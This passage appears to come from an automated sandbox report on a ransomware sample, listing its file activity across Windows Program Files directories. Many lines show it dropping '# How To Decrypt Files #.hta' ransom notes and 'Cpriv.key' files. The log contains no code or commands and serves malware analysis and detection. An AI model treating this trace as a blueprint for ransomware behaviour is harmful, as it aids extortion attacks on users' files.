Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02218_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105504.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\BlackTieLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.LTS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0298897.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103058.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02276_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\localizedSettings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01745_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0196374.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00014_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199465.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PPTIRMV.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\RequestImport.cmd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200467.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WHIRL1.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\81.0.4044.129.manifest de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01158_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00013_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.PH.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00526_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ms.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBCAL.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\MSB1AR.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\localizedStrings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\management\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00253_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\CGMIMP32.FNT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CAPSULES\CAPSULES.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0304933.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RADIAL\RADIAL.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18211_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10308_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105390.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309904.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_INIT.XSN de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLLIBR.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\SessionMember.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18221_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\BORDERS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152898.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Photo Viewer\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PRRT.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10307_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\MENU.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00049_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_GreenTea.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287018.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSEnv\PublicAssemblies\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\LogoDev.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\uk.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF 